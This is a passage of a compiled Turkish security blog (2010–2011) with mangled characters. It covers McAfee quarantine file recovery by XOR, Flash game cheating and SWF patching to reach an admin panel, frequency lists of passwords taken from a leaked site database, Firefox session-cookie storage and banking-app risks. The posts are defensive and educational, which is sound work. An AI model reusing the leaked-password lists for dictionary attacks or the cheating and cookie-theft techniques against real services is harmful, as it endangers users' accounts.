Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 10: Hack 4 Career - 2011

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

